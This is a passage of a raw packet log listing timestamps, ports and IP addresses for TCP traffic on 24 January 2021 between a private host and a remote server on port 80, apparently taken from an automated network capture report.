                                                                    Jan 24, 2021 18:03:31.478755951 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478794098 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478817940 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.478836060 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478873968 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478895903 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.478913069 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478952885 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478976011 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.478992939 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.479041100 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.479057074 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.479084015 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.479124069 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.479146957 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.479162931 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.479202986 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.479222059 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.479242086 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.479281902 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.479300976 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.479321003 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.479368925 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.479387999 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.479415894 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.479454994 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.479479074 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.479495049 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.479556084 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.480122089 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.612816095 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.612875938 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.612907887 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.612938881 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.612970114 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613012075 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613051891 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613090038 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613130093 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613179922 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613212109 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.613224030 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613241911 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.613248110 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.613265991 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613281965 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.613307953 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613351107 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613375902 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.613426924 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613471031 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613471985 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.613511086 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613542080 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.613553047 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613603115 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613619089 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.613647938 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613687992 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613715887 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.613728046 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613768101 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613791943 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.613794088 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613835096 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613853931 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.613873959 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613923073 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.613939047 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.613967896 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614006996 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614028931 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.614047050 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614088058 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614118099 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.614125967 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614166021 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614190102 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.614204884 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614254951 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614267111 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.614300013 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614340067 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614362001 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.614379883 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614423990 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614443064 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.614463091 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614505053 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614525080 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.614546061 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614593983 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614610910 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.614636898 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614675999 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614698887 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.614717007 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614756107 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614779949 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.614794970 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614835978 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614852905 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.614876032 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614914894 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614937067 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.616286039 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.748231888 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.748287916 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.748332024 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.748354912 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.748370886 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.748418093 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.748437881 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.748460054 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.748498917 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.748516083 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.748548985 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.748591900 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.748600006 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.748631001 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.748671055 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.748684883 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.748713017 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.748752117 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.748764992 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.748791933 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.748831034 CET8049172162.241.61.203192.168.2.22
Jan 24, 2021 18:03:31.748845100 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.749157906 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.749496937 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.749541998 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.749582052 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.749604940 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.749629021 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.749671936 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.749689102 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.749711990 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.749751091 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.749778986 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.749792099 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.749831915 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.749845028 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.749870062 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.749908924 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.749927998 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.749962091 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.750005960 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.750017881 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.750047922 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.750089884 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.750114918 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.750130892 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.750169039 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.750184059 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.750207901 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.750247002 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.750262022 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.750297070 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.750354052 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.750366926 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.750405073 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.750447989 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.750456095 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.750488043 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.750524998 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.750540972 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.750566959 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.750583887 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.750606060 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.750653028 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.750658989 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.750695944 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.750735044 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.750757933 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.750772953 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.750812054 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.750829935 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.750853062 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.750891924 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.750911951 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.750962973 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.751281023 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.882129908 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.882194042 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.882225037 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.882256031 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.882297039 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.882335901 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.882374048 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.882421970 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.882467031 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.882504940 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.882544041 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.882582903 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.882586956 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.882616997 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.882622004 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.882623911 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.882644892 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.882666111 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.882734060 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.882816076 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.884023905 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.884082079 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.884119987 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.884156942 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.884161949 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.884205103 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.884227037 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.884254932 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.884299994 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.884318113 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.884341002 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.884383917 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.884407043 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.884428978 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.884468079 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.884500027 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.884509087 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.884547949 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.884579897 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.884597063 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.884640932 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.884660959 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.884679079 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.884717941 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.884742022 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.884757042 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.884793997 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.884819984 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.884831905 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.884871006 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.884895086 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.884917974 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.884962082 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.884984970 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.884999990 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.885040045 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.885061026 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.885080099 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.885117054 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.885144949 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.885157108 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.885198116 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.885238886 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.885246992 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.885292053 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.885313034 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.885329962 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.885369062 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.885394096 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.885446072 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:31.885464907 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:31.891057968 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:32.016204119 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.016264915 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.016294003 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.016324997 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.016364098 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.016418934 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.016464949 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.016501904 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.016531944 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:32.016541004 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.016566992 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:32.016572952 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:32.016581059 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.016618013 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.016649008 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:32.016655922 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.016695023 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.016719103 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:32.016742945 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.016787052 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.016791105 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:32.016824007 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.016859055 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:32.016864061 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.016905069 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.016932011 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:32.016942978 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.016982079 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.017009020 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:32.017021894 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.017070055 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.017090082 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:32.017116070 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.017155886 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.017185926 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:32.017195940 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.017235041 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.017263889 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:32.017271996 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.017311096 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.017343998 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:32.017349005 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.017411947 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:32.017436028 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.017489910 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.017533064 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.017559052 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:32.017573118 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.017612934 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.017641068 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:32.017651081 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.017688990 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.017729044 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
Jan 24, 2021 18:03:32.017735004 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
Jan 24, 2021 18:03:32.017766953 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
